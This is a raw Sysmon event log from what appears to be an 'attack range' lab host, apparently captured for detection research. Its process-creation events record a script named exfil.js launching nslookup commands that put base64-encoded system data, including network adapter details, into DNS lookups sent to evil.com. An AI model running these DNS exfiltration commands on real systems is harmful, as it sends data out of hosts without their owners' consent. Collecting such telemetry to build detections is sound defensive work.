14:21:47.819{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-DD45-000000005F02}7616C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.819{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-DD45-000000005F02}7616C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.819{2E1864BB-18FB-629A-DD45-000000005F02}76167336C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-DC45-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DD45-000000005F02}7616C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DC45-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-18E0-629A-6742-000000005F02}39765104C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-DC45-000000005F02}5988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.808{2E1864BB-18FB-629A-DC45-000000005F02}5988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxhgrz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.803{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmbqyvlo.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.781{2E1864BB-18FB-629A-DA45-000000005F02}73445932C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-DB45-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DB45-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.767{2E1864BB-18FB-629A-D945-000000005F02}79364992C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-DB45-000000005F02}2812C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.779{2E1864BB-18FB-629A-DB45-000000005F02}2812C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-D945-000000005F02}7936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmbqyvlo.tmp 2>&1 10341000x8000000000000000214371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.750{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-DA45-000000005F02}7344C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.750{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-DA45-000000005F02}7344C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.750{2E1864BB-18FB-629A-DA45-000000005F02}73445932C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D945-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-DA45-000000005F02}7344C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D945-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-18E0-629A-6742-000000005F02}39767772C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-D945-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.740{2E1864BB-18FB-629A-D945-000000005F02}7936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmbqyvlo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.734{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlusyzil.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 